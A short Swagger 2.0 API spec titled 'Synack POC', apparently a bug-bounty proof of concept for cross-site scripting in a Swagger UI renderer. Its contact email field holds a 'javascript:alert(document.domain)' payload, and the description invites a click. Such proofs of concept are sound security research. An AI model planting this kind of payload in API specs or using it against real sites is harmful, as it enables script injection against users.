swagger: "2.0"
info: 
  title: "Synack POC"
  description: "Please to click Terms of service"
  termsOfService: "https://google.com"
  contact: 
    name: "API Support"
    url: "https://google.com"
    email: "javascript:alert(document.domain)"
  version: "1.0.1"
